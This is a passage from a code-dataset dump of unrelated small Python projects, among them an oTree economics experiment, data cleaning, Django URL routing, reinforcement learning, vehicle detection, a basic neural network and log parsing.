== group.random_player):\n return True\n\n def vars_for_template(self):\n config = Constants.config\n\n return {\n 'mult': config[0][self.round_number - 1][\"multiplier\"],\n }\n pass\nclass AuthorityInfo(Page):\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (self.player.id_in_group == group.random_player):\n return False\n else:\n return True\n\n def vars_for_template(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n if(mode_num == 1 and group.authority_multiply):\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + \".\"\n elif(mode_num == 1 and not group.authority_multiply):\n decision = Constants.decisions[0]\n elif(mode_num == 2 and not group.auth_appropriate):\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + \" .\"\n else:\n decision = Constants.decisions[1] + \" \" + str(config[0][self.round_number - 1][\"multiplier\"]) + Constants.decisions[2] + str(config[0][self.round_number - 1][\"tax\"] * 100) + Constants.decisions[3]\n\n return {\"decision\": decision}\n\n\n\n\n\n\n\n\nclass Authority2(Page):\n form_model = 'group'\n form_fields = ['auth_appropriate']\n\n def is_displayed(self):\n config = Constants.config\n group = self.group\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n if (mode_num == 2 and self.player.id_in_group == group.random_player):\n return True\n\n def vars_for_template(self):\n config = Constants.config\n\n displaytax = config[0][self.round_number - 1][\"tax\"] * 100\n\n return {\n 'mult': config[0][self.round_number - 1][\"multiplier\"],\n 'tax': displaytax\n }\n\n pass\n\n\nclass AuthorityWaitPage(WaitPage):\n def after_all_players_arrive(self):\n config = Constants.config\n group = self.group\n players = group.get_players()\n\n mode_num = config[0][self.round_number - 1][\"mode\"]\n\n # NOTE: the code below can definitely be refactored (get rid of duplicate code), but I just want to see if\n # the functionality is correct first\n if(mode_num == 1 and group.authority_multiply):\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n\n elif(mode_num == 1 and not group.authority_multiply):\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n\n elif(mode_num == 2 and not group.auth_appropriate):\n # same as content in first if statement block\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n group.total_contribution = sum(contributions)\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n group.individual_share = group.total_earnings / Constants.players_per_group\n\n for p in players:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n # Mode 2, Authority 2, Button 2\n else:\n # contributions = [p.contribution for p in players]\n contributions = [p.contribution * config[0][int(self.round_number - 1)][\"tax\"] for p in players]\n # group.total_contribution = sum(contributions) * config[0][int(self.round_number - 1)][\"tax\"]\n group.total_contribution = sum(contributions)\n\n group.total_earnings = config[0][self.round_number - 1][\"multiplier\"] * group.total_contribution\n appropriation = config[0][int(self.round_number - 1)][\"tax\"] * group.total_earnings\n group.individual_share = group.total_earnings / Constants.players_per_group\n \n\n print(\"group.total_contribution after subtracting appropriation is: \", group.total_contribution)\n print(\"appropriation is: \", appropriation)\n print(\"group.total_earnings is: \", group.total_earnings)\n print(\"group.individual_share is: \", group.individual_share)\n\n for p in players:\n if (p.id_in_group == group.random_player):\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n p.payoff += appropriation\n else:\n p.payoff = p.income - (config[0][int(self.round_number - 1)][\"tax\"] * p.contribution) + group.individual_share\n # p.payoff -= appropriation / (len(players) - 1)\n p.payoff -= appropriation / (len(players) - 1)\n\n print(\"did authority decide to multiply: \", group.authority_multiply)\n pass\n\nclass TaxResults(Page):\n def is_displayed(self):\n # May cause a problem, may change to something more direct later\n return self.player.payoff != 0\n\n def vars_for_template(self):\n config = Constants.config\n share = self.group.total_earnings / Constants.players_per_group\n\n\n return {\n 'total_earnings': self.group.total_earnings,\n 'player_earnings': share\n }\n\n\npage_sequence = [Introduction, Transcribe2, Transcribe, TranscribeResults, part2, resultsWaitPage,\n Authority, Authority2, AuthorityWaitPage, AuthorityInfo, TaxResults]","repo_name":"Kimberley1012/tesis","sub_path":"real_effort/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41313388814","text":"import pandas as pd\nimport numpy as np\n\nclass NJCleaner:\n def __init__(self,path:str) -> None:\n self.data=pd.read_csv(path)\n def order_by_scheduled_time(self)->pd.DataFrame:\n #newdata=self.data.copy()\n return self.data.sort_values(by=[\"scheduled_time\"])\n def drop_columns_and_nan(self)->pd.DataFrame:\n nan=self.data.dropna().drop(['from','to'],axis=1)\n self.data=nan\n return self.data\n def convert_date_to_day(self)->pd.DataFrame:\n self.data['day']=pd.to_datetime(self.data['date']).dt.day_name()\n drop=self.data.drop(['date'],axis=1)\n self.data=drop\n return self.data\n def convert_scheduled_time_to_part_of_the_day(self)->pd.DataFrame:\n self.data[\"part_of_the_day\"]=pd.to_datetime(self.data['scheduled_time']).dt.hour.apply(lambda time:'early_morning' if time>=4 and time<8 \n else('morning' if time>=8 and time<12 \n else ('afternoon' if time>=12 and time<16 \n else('evening' if time>=16 and time<20 \n else('night'if time>=20 and time<24 \n else 'late_night')))))\n \n colum=self.data.drop(columns=['scheduled_time'])\n self.data=colum\n return self.data \n def convert_delay(self)->pd.DataFrame:\n self.data['delay']=self.data['delay_minutes'].apply(lambda delay:0 if delay<=5 else 1)\n return self.data\n def drop_unnecessary_columns(self)->pd.DataFrame:\n colum=self.data.drop(columns=['train_id','actual_time','delay_minutes'])\n self.data=colum\n return self.data\n def save_first_60k(self,path:str):\n sixtyk=self.data.iloc[:60000]\n self.data=sixtyk\n sixtyk.to_csv(path,index=False)\n def prep_df(self,path:str):\n self.order_by_scheduled_time()\n self.drop_columns_and_nan()\n self.convert_date_to_day()\n self.convert_scheduled_time_to_part_of_the_day()\n self.convert_delay()\n self.drop_unnecessary_columns()\n self.save_first_60k(path)\n self.data.to_csv(path)\n\n","repo_name":"karcagmate/BEVADAT2022232","sub_path":"HAZI/HAZI06/NJCleaner.py","file_name":"NJCleaner.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73588805164","text":"from django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import include, path, reverse_lazy\nfrom django.views.generic import CreateView\n\nhandler404 = 'pages.views.page_not_found'\nhandler500 = 'pages.views.server_error'\n\nurlpatterns = [\n path('', include('blog.urls', namespace='blog')),\n path('pages/', include('pages.urls', namespace='pages')),\n path('admin/', admin.site.urls),\n path('auth/', include('django.contrib.auth.urls')),\n path(\n 'auth/registration/',\n CreateView.as_view(\n template_name='registration/registration_form.html',\n form_class=UserCreationForm,\n success_url=reverse_lazy('blog:index'),\n ),\n name='registration',\n ),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n\n # Добавить к списку urlpatterns список адресов из приложения debug_toolbar:\n urlpatterns += (path('__debug__/', include(debug_toolbar.urls)),)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"mfilinov/django_sprint4","sub_path":"blogicum/blogicum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"7572570864","text":"import gym\nfrom RL_brain import ActorCritic\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv = gym.make('CartPole-v0')\nprint(env.action_space)\nprint(env.observation_space)\nprint(env.observation_space.high)\nprint(env.observation_space.low)\n\n\nRL = ActorCritic(\n n_states=env.observation_space.shape[0],\n n_actions=env.action_space.n)\n\ntotal_steps = 0\n# Set up lists to hold results\ntotal_rewards = []\nbatch_rewards = []\nbatch_actions = []\nbatch_states = []\nbatch_counter = 1\nbatch_size = 10\n\nfor i_episode in range(2000):\n\n states = []\n rewards = []\n actions = []\n final_r = 0\n done = False\n s_0 = env.reset()\n\n while not done:\n env.render()\n\n action = RL.choose_action(s_0)\n one_hot_action = [int(k == action) for k in range(env.action_space.n)]\n\n s_1, r, done, info = env.step(action)\n states.append(s_0)\n rewards.append(r)\n actions.append(one_hot_action)\n s_0 = s_1\n\n if done:\n batch_rewards.extend(rewards)\n batch_states.extend(states)\n batch_actions.extend(actions)\n batch_counter += 1\n total_rewards.append(sum(rewards))\n\n if batch_counter == batch_size:\n RL.learn(batch_actions, batch_states, batch_rewards)\n batch_rewards = []\n batch_actions = []\n batch_states = []\n batch_counter = 1\n\n avg_rewards = np.mean(total_rewards[-100:])\n # Print running average\n print(\"Ep: \", i_episode + 1, \"Average of last 100: %.4f\" % avg_rewards)\n\nRL.plot_cost()\n\nplt.plot(np.arange(len(total_rewards)), total_rewards)\nplt.ylabel('Cost')\nplt.xlabel('training steps')\nplt.show()\n\nenv.close()\n","repo_name":"shengfeng/reinforcement","sub_path":"Actor-Critic/run_CartPole.py","file_name":"run_CartPole.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70550514605","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 08 15:20:34 2017\r\n\r\n@author: super\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom collections import deque\r\nfrom scipy.ndimage.measurements import label\r\nfrom utils import draw_boxes\r\n\r\nclass VehicleFinder4Image(object):\r\n \r\n def __init__(self, windows, clf):\r\n self.windows = windows\r\n self.clf = clf\r\n \r\n def search_windows(self, img):\r\n hot_windows = []\r\n imgs = []\r\n for window in self.windows:\r\n (x1, y1), (x2, y2) = window\r\n if (x2 - x1 != 64) and (y2 - y1 != 64):\r\n img_win = cv2.resize(img[y1:y2, x1:x2], (64, 64))\r\n else: img_win = img[y1:y2, x1:x2]\r\n imgs.append(img_win)\r\n predictions = self.clf.predict(imgs)\r\n for i, window in enumerate(self.windows):\r\n if predictions[i] == 1:\r\n hot_windows.append(window)\r\n return hot_windows\r\n \r\n def add_heat(self, heatmap, hot_windows):\r\n for window in hot_windows:\r\n (x1, y1), (x2, y2) = window\r\n heatmap[y1:y2, x1:x2] += 1\r\n return heatmap\r\n \r\n def heat_thresh(self, heatmap, thresh):\r\n heatmap = cv2.resize(heatmap, (80, 45))\r\n heatmap = cv2.resize(heatmap, (1280, 720))\r\n heatmap[heatmap <= thresh] = 0\r\n return heatmap\r\n \r\n def detect_vehicles_bboxes(self, heatmap):\r\n labels = label(heatmap)\r\n bboxes = []\r\n for idx in range(1, labels[1]+1):\r\n # Find pixels with each car_number label value\r\n nonzero = (labels[0] == idx).nonzero()\r\n # Identify x and y values of those pixels\r\n nonzeroy = np.array(nonzero[0])\r\n nonzerox = np.array(nonzero[1])\r\n # Define a bounding box based on min/max x and y\r\n bbox = ((np.min(nonzerox), np.min(nonzeroy)),\r\n (np.max(nonzerox), np.max(nonzeroy)))\r\n bboxes.append(bbox)\r\n return bboxes\r\n \r\n def apply(self, img):\r\n hot_windows = self.search_windows(img)\r\n heatmap = np.zeros_like(img[:,:,0], dtype=np.float32)\r\n heatmap = self.add_heat(heatmap, hot_windows)\r\n heatmap = self.heat_thresh(heatmap, 4)\r\n vehicle_bboxes = self.detect_vehicles_bboxes(heatmap)\r\n img_detected = draw_boxes(img, vehicle_bboxes)\r\n return img_detected\r\n\r\n\r\nclass VehicleFinder4Video(VehicleFinder4Image):\r\n \r\n def __init__(self, windows, clf, n_recs=5):\r\n super(VehicleFinder4Video, self).__init__(windows, clf)\r\n self.n_recs = n_recs\r\n self.heatmaps = deque(maxlen=self.n_recs)\r\n \r\n def apply(self, img):\r\n hot_windows = self.search_windows(img)\r\n heatmap = np.zeros_like(img[:,:,0], dtype=np.float32)\r\n heatmap = self.add_heat(heatmap, hot_windows)\r\n self.heatmaps.append(heatmap)\r\n heatmap = np.mean(self.heatmaps, axis=0)\r\n heatmap = self.heat_thresh(heatmap, 4)\r\n vehicle_bboxes = self.detect_vehicles_bboxes(heatmap)\r\n img_detected = draw_boxes(img, vehicle_bboxes)\r\n return img_detected","repo_name":"AlphaLFC/CarND-Vehicle-Detection-P5","sub_path":"VehicleFinder/vehicle_finder.py","file_name":"vehicle_finder.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31098388362","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\n\r\nsource = requests.get('http://switch.sjsu.edu/archive/wp/v28/index.html%3Fp=571.html').text\r\nsoup = BeautifulSoup(source, 'lxml')\r\nfinal_text = []\r\nessay = soup.find('div',class_='content clearfix')\r\nsummary = essay.find_all('p')\r\nwith open(r\"C:\\Users\\zai_n\\Documents\\pythonbottexts\\article22.txt\", \"w\") as file:\r\n file.write(str(summary))\r\nprint(summary)\r\n","repo_name":"zainiba/The-Collective-Mind","sub_path":"workscrape.py","file_name":"workscrape.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16760693651","text":"import random\n\n\ndef guess_the_number(n=random.randint(1, 10)):\n print(f\"the number is: {n!r}\")\n tries = 0\n while tries < 5:\n guess = input(\"Guess the number? \")\n try:\n guessed_number = int(guess)\n if guessed_number == n:\n print(\"You won!\")\n break\n elif guessed_number < n:\n print(\"The number is lower than the guess.\")\n else:\n print(\"The number is higher than the guess\")\n except Exception as e:\n raise\n tries += 1\n\n\nguess_the_number()\n","repo_name":"chaudhryjunaid/learn_python","sub_path":"guess_the_number.py","file_name":"guess_the_number.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39113905101","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport pickle\nfrom numpy.linalg import cholesky\n\n\nclass Dataset:\n def __init__(self):\n self.index = 0 # TODO: what this index is for?\n self.obs = [] # for irisData is like [array(5.0,3.5,1.3,0.3), array(5.0,3.5,1.3,0.3), ... , ]\n self.classes = [] # for irisData is [array(1,0,0), array(0,1,0), array(0,0,1), ... , ]\n self.num_obs = 0 # number of observations\n self.num_classes = 0 # number of classes, for irisData is 3\n self.indices = [] # [0, 1, 2, 3, 4, ... , num_obs]\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.num_obs:\n self.index = 0\n raise StopIteration\n else:\n self.index += 1\n return self.obs[self.index - 1], self.classes[self.index - 1]\n\n def reset(self):\n self.index = 0\n\n def get_obs_with_target(self, k):\n \"\"\"\n from self.classes read the index_list, which the class is a particular k like (1,0,0)\n :param k:\n :return: list containing all the observations [array(5.0,3.5,1.3,0.3), array(4.9,3.0,1.4,0.2), ...]\n with label k(1,0,0)\n \"\"\"\n index_list = [index for index, value in enumerate(self.classes) if value == k] #\n return [self.obs[i] for i in index_list]\n\n def get_all_obs_class(self, shuffle=False):\n \"\"\"\n shuffle indices, get all the pairs in that order.\n :param shuffle:\n :return: list containing all the observations with target [(array(5.0,3.5,1.3,0.3),array(1,0,0)),\n (array(4.9,3.0,1.4,0.2),array(1,0,0)), ... ]\n \"\"\"\n if shuffle:\n random.shuffle(self.indices)\n return [(self.obs[i], self.classes[i]) for i in self.indices]\n\n def get_mini_batches(self, batch_size, shuffle=False):\n if shuffle:\n random.shuffle(self.indices)\n\n batches = [(self.obs[self.indices[n:n + batch_size]],\n self.classes[self.indices[n:n + batch_size]])\n for n in range(0, self.num_obs, batch_size)]\n return batches\n\n\nclass IrisDataset(Dataset):\n def __init__(self, path):\n super(IrisDataset, self).__init__()\n self.file_path = path\n self.loadFile()\n self.indices = np.arange(self.num_obs)\n\n def loadFile(self):\n # load a comma-delimited text file into an np matrix\n resultList = []\n f = open(self.file_path, 'r')\n for line in f:\n line = line.rstrip('\\n') # \"1.0,2.0,3.0\"\n sVals = line.split(',') # [\"1.0\", \"2.0, \"3.0\"]\n fVals = list(map(np.float32, sVals)) # [1.0, 2.0, 3.0]\n resultList.append(fVals) # [[1.0, 2.0, 3.0] , [4.0, 5.0, 6.0]]\n f.close()\n data = np.asarray(resultList, dtype=np.float32) # not necessary\n self.obs = data[:, 0:4]\n self.classes = data[:, 4:7]\n self.num_obs = data.shape[0]\n self.num_classes = 3\n\n\n# Activations\ndef tanh(x, deriv=False):\n \"\"\"\n d/dx tanh(x) = 1 - tanh^2(x)\n during backpropagation when we need to go though the derivative we have already computed tanh(x),\n therefore we pass tanh(x) to the function which reduces the gradient to:\n 1 - tanh(x)\n \"\"\"\n if deriv:\n return 1.0 - np.tanh(x)\n else:\n return np.tanh(x)\n\n\ndef sigmoid(x, deriv=False):\n \"\"\"\n Task 2a\n This function is the sigmoid function. It gets an input digit or vector and should return sigmoid(x).\n The parameter \"deriv\" toggles between the sigmoid and the derivate of the sigmoid. Hint: In the case of the derivate\n you can expect the input to be sigmoid(x) instead of x\n :param x: type: np.array\n :param deriv: type: Boolean\n :return: type: np.array\n \"\"\"\n if deriv:\n return x * (1 - x)\n else:\n return 1 / (1 + np.exp(-x))\n\n\ndef softmax(x, deriv=False):\n \"\"\"\n Task 2a\n This function is the sigmoid function with a softmax applied. This will be used in the last layer of the network\n The derivate will be the same as of sigmoid(x)\n :param x: type: np.array\n :param deriv: type: Boolean\n :return: type: np.array\n \"\"\"\n if deriv:\n return x * (1 - x)\n else:\n exps = np.exp(x)\n return exps / np.sum(exps)\n\n\nclass Layer:\n def __init__(self, numInput, numOutput, activation=sigmoid, type='random'):\n # print('Create layer with: {}x{} @ {}'.format(numInput, numOutput, activation))\n self.ni = numInput\n self.no = numOutput\n self.weights = np.zeros(shape=[self.ni, self.no], dtype=np.float32)\n self.biases = np.zeros(shape=[self.no], dtype=np.float32)\n self.initializeWeights(type)\n\n self.activation = activation\n self.last_input = None # placeholder, can be used in backpropagation -- I use this to store the input of this layer: y_{l-1}\n self.last_output = None # placeholder, can be used in backpropagation -- output of inference function: y_{l}\n self.last_nodes = None # placeholder, can be used in backpropagation -- TODO: to store the value of nodes: z_{l}, but it's never used\n\n def initializeWeights(self, type):\n \"\"\"\n Task 2d\n Initialized the weight matrix of the layer. Weights should be initialized to something other than 0.\n You can search the literature for possible initialization methods.\n :return: None\n \"\"\"\n if type == 'random':\n self.weights = np.random.randn(self.ni, self.no) * np.sqrt(2 / self.ni)\n self.biases = np.random.randn(self.no) * np.sqrt(2 / self.no)\n elif type == 'uniform':\n self.weights = np.random.uniform(-0.1, 0.1, size=(self.ni, self.no))\n self.biases = np.random.uniform(-0.1, 0.1, size=(self.no))\n elif type == 'gaussian':\n mean = 0\n cov = 1/(self.no * self.ni)\n print(mean, cov)\n self.weights = cov * np.random.standard_normal(size=(self.ni, self.no)) + mean\n self.biases = cov * np.random.standard_normal(self.no) + mean\n\n def inference(self, x):\n \"\"\"\n Task 2b\n This transforms the input x with the layers weights and bias and applies the activation function\n Hint: you should save the input and output of this function usage in the backpropagation\n :param x:\n :return: output of the layer\n :rtype: np.array\n \"\"\"\n self.last_input = x\n self.last_nodes = np.matmul(x.reshape(1, self.ni), self.weights) + self.biases\n self.last_output = self.activation(self.last_nodes)\n return self.last_output\n\n def backprop(self, error):\n \"\"\"\n Task 2c\n This function applied the backpropagation of the error signal. The Layer receives the error signal from the following\n layer or the network. You need to calculate the error signal for the next layer by backpropagating thru this layer.\n You also need to compute the gradients for the weights and bias.\n :param error:\n :return: error signal for the preceeding layer\n :return: gradients for the weight matrix\n :return: gradients for the bias\n :rtype: np.array\n \"\"\"\n gradients_weight = np.matmul(self.last_input.reshape(self.ni, 1), \\\n (error * sigmoid(self.last_output, True)).reshape(1, self.no))\n gradients_bias = error * sigmoid(self.last_output, True)\n error_signal = np.matmul((error * sigmoid(self.last_output, True)).reshape(1, self.no), self.weights.T)\n return gradients_weight, gradients_bias, error_signal\n\n\nclass BasicNeuralNetwork():\n def __init__(self, layer_sizes=[5], num_input=4, num_output=3, num_epoch=50, learning_rate=0.1,\n mini_batch_size=8, type_of_initial_weights='random'):\n self.layers = [] # to store the Objection layer. [layers[0](form input to hidden layer 1),\n # layers[1], ... ,\n # layers[len(self.ls)]]\n self.ls = layer_sizes # I consider this to be the size of different hidden layers [5,5,4] (len(self.ls) = 3),\n # don't contain the size of input and output layer. The whole structure should be 4 + [5, 5, 4] + 3;\n self.ni = num_input\n self.no = num_output\n self.lr = learning_rate\n self.num_epoch = num_epoch\n self.mbs = mini_batch_size\n self.type = type_of_initial_weights\n\n self.constructNetwork()\n\n def forward(self, x):\n \"\"\"\n Task 2b\n This function forwards a single feature vector through every layer and return the output of the last layer\n :param x: input feature vector\n :return: output of the network\n :rtype: np.array\n \"\"\"\n self.layers[0].inference(x)\n for i in range(1, len(self.ls)):\n self.layers[i].inference(self.layers[i - 1].last_output)\n output = self.layers[len(self.ls)].inference(self.layers[len(self.ls) - 1].last_output)\n return output\n\n def train(self, train_dataset, eval_dataset=None, monitor_ce_train=True, monitor_accuracy_train=True,\n monitor_ce_eval=True, monitor_accuracy_eval=True, monitor_plot='monitor.png'):\n ce_train_array = []\n ce_eval_array = []\n acc_train_array = []\n acc_eval_array = []\n for e in range(self.num_epoch):\n if self.mbs:\n self.mini_batch_SGD(train_dataset)\n else:\n self.online_SGD(train_dataset)\n print('Finished training epoch: {}'.format(e))\n if monitor_ce_train:\n ce_train = self.ce(train_dataset)\n ce_train_array.append(ce_train)\n print('CE (train): {}'.format(ce_train))\n if monitor_accuracy_train:\n acc_train = self.accuracy(train_dataset)\n acc_train_array.append(acc_train)\n print('Accuracy (train): {}'.format(acc_train))\n if monitor_ce_eval:\n ce_eval = self.ce(eval_dataset)\n ce_eval_array.append(ce_eval)\n print('CE (eval): {}'.format(ce_eval))\n if monitor_accuracy_eval:\n acc_eval = self.accuracy(eval_dataset)\n acc_eval_array.append(acc_eval)\n print('Accuracy (eval): {}'.format(acc_eval))\n\n if monitor_plot:\n fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(9, 4))\n line1, = ax[0].plot(ce_train_array, '--', linewidth=2, label='ce_train')\n line2, = ax[0].plot(ce_eval_array, label='ce_eval')\n\n line3, = ax[1].plot(acc_train_array, '--', linewidth=2, label='acc_train')\n line4, = ax[1].plot(acc_eval_array, label='acc_eval')\n\n ax[0].legend(loc='upper right')\n ax[1].legend(loc='upper left')\n ax[1].set_ylim([0, 1])\n\n plt.savefig(monitor_plot)\n\n def online_SGD(self, dataset):\n \"\"\"\n Task 2d\n This function trains the network in an online fashion. Meaning the weights are updated after each observation.\n :param dataset:\n :return: None\n \"\"\"\n dataset = dataset.get_all_obs_class(True)\n for item in dataset:\n output = self.forward(item[0])\n error_signal = output - item[1]\n for i in range(len(self.ls), -1, -1):\n gradients_weight, gradients_bias, error_signal = self.layers[i].backprop(error_signal)\n self.layers[i].weights = self.layers[i].weights - self.lr * gradients_weight\n self.layers[i].biases = self.layers[i].biases - self.lr * gradients_bias\n\n\n def mini_batch_SGD(self, dataset):\n \"\"\"\n Task 2d\n This function trains the network using mini batches. Meaning the weights updates are accumulated and applied after each mini batch.\n :param dataset:\n :return: None\n \"\"\"\n dataset.reset()\n mini_batches = dataset.get_mini_batches(self.mbs)\n for item in mini_batches:\n error_signal = 0\n for i in range(self.mbs):\n try:\n dataset.__next__()\n except StopIteration:\n break\n output = self.forward(item[0][i])\n error_signal += output - item[1][i]\n error_signal = error_signal / self.mbs\n for k in range(len(self.ls), -1, -1):\n gradients_weight, gradients_bias, error_signal = self.layers[k].backprop(error_signal)\n self.layers[k].weights = self.layers[k].weights - self.lr * gradients_weight\n self.layers[k].biases = self.layers[k].biases - self.lr * gradients_bias\n\n def constructNetwork(self):\n \"\"\"\n Task 2d\n uses self.ls self.ni and self.no to construct a list of layers. The last layer should use sigmoid_softmax as an activation function. any preceeding layers should use sigmoid.\n :return: None\n \"\"\"\n l = Layer(self.ni, self.ls[0], sigmoid, self.type)\n self.layers.append(l)\n for i in range(1, len(self.ls)):\n l = Layer(self.ls[i - 1], self.ls[i], sigmoid)\n self.layers.append(l)\n l = Layer(self.ls[len(self.ls) - 1], self.no, softmax)\n self.layers.append(l)\n\n def ce(self, dataset):\n ce = 0\n for x, t in dataset:\n t_hat = self.forward(x)\n ce += np.sum(np.nan_to_num(-t * np.log(t_hat) - (1 - t) * np.log(1 - t_hat)))\n return ce / dataset.num_obs\n\n def accuracy(self, dataset):\n cm = np.zeros(shape=[dataset.num_classes, dataset.num_classes], dtype=np.int)\n for x, t in dataset:\n t_hat = self.forward(x)\n c_hat = np.argmax(t_hat) # index of largest output value\n c = np.argmax(t)\n cm[c, c_hat] += 1\n\n correct = np.trace(cm)\n return correct / dataset.num_obs\n\n def load(self, path=None):\n if not path:\n path = './network.save'\n with open(path, 'rb') as f:\n self.layers = pickle.load(f)\n\n def save(self, path=None):\n if not path:\n path = './network.save'\n with open(path, 'wb') as f:\n pickle.dump(self.layers, f)\n","repo_name":"iFocusing/BasicNeuralNetwork","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":14547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36396601430","text":"from collections import defaultdict\nimport reverse_geocoder as rg\nuid = ''\nbuffer_query = ''\nfirst_char = ''\nlocal = ''\ngps = ''\nline_buf = '' \nrussian_query = defaultdict(int)\nenglish_query = defaultdict(int)\nquery_in_russia = []\ndef is_ru(buf):\n if buf.find('ru') != -1:\n return True\n else:\n return False\ndef find_country(coordinates):\n ans = rg.search(coordinates, mode=1)\n return ans[0]['cc']\n\ndef is_query(log, first_char, uid):\n if log[-1] != uid and uid != '':\n return True\n if log[0][1] != first_char and first_char != '':\n return True\n return False\nwith open(\"test.txt\") as f:\n for line in f:\n log = list(line.split(';'))\n b = gps.replace('[', '').replace(']', '')\n coordinates = list(reversed((b.split(','))))\n if is_query(log, first_char, uid) and len(buffer_query) > 4:\n if is_ru(local):\n russian_query[buffer_query] += 1\n if not is_ru(local):\n english_query[buffer_query] += 1\n if gps != \"None\" and gps != '':\n if find_country(coordinates) == \"RU\":\n query_in_russia.append(buffer_query)\n buffer_query = log[0]\n local = log[2]\n gps = log[3]\n uid = log[-1]\n first_char = log[0][1]\n log.clear()\n line_buf = line\nprint(sorted(dict(russian_query).items(), key = lambda x : x[1], reverse = True))\nprint(sorted(dict(english_query).items(), key = lambda x : x[1], reverse = True))\nprint(query_in_russia)\n","repo_name":"razdenand/Python_apps","sub_path":"Parser_logs/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28336882687","text":"import numpy as np\nnp.set_printoptions(precision=4)\nimport pickle\nimport pdb\nimport math\nimport csv\n\n\ndef get_data_stats():\n data = pickle.load(open('data.pkl','rb'))\n\n stats = []\n avg_stats = []\n \n time_identical = {}\n time_reverse = {}\n\n for sub in data:\n time_identical[sub] = []\n time_reverse[sub] = []\n\n time = []\n for sub in data:\n \n total = {'1':0 , '3': 0, '5': 0}\n correct_first = {'1':0 , '3': 0, '5': 0}\n correct_first_i = {'1':0 , '3': 0, '5': 0}\n correct_first_r = {'1':0 , '3': 0, '5': 0}\n incorrect_first_i = {'1':0 , '3': 0, '5': 0}\n incorrect_first_r = {'1':0 , '3': 0, '5': 0}\n incorrect_second_correct_first_i = {'1':0 , '3': 0, '5': 0}\n incorrect_second_correct_first_r = {'1':0 , '3': 0, '5': 0}\n correct_second_incorrect_first_i = {'1':0 , '3': 0, '5': 0}\n correct_second_incorrect_first_r = {'1':0 , '3': 0, '5': 0}\n \n \n for trial in data[sub]:\n for pair in data[sub][trial]:\n\n datum = data[sub][trial][pair]\n reps = datum['xREPS']\n total[reps] += 1\n\n if datum['ANSWER1'] == 'C':\n correct_first[reps] += 1\n\n if ('B1' in datum and 'B2' in datum) or ('F1' in datum and 'F2' in datum):\n identical = 1\n else:\n identical = 0\n\n\n if datum['ANSWER1'] == 'C' and identical:\n correct_first_i[reps] += 1\n elif datum['ANSWER1'] == 'C' and not identical:\n correct_first_r[reps] += 1\n elif datum['ANSWER1'] != 'C' and identical:\n incorrect_first_i[reps] += 1\n elif datum['ANSWER1'] != 'C' and not identical:\n incorrect_first_r[reps] += 1\n \n if datum['ANSWER1'] == 'C' and datum['ANSWER2'] != 'C':\n if identical:\n incorrect_second_correct_first_i[reps] += 1\n else:\n incorrect_second_correct_first_r[reps] += 1\n\n if datum['ANSWER1'] != 'C' and datum['ANSWER2'] == 'C':\n if identical:\n correct_second_incorrect_first_i[reps] += 1\n else:\n correct_second_incorrect_first_r[reps] += 1\n\n if datum['ANSWER1'] == 'C' and datum['ANSWER2'] == 'C':\n if identical:\n if 'F1' in datum:\n if int(datum['F1']) > 6000 or 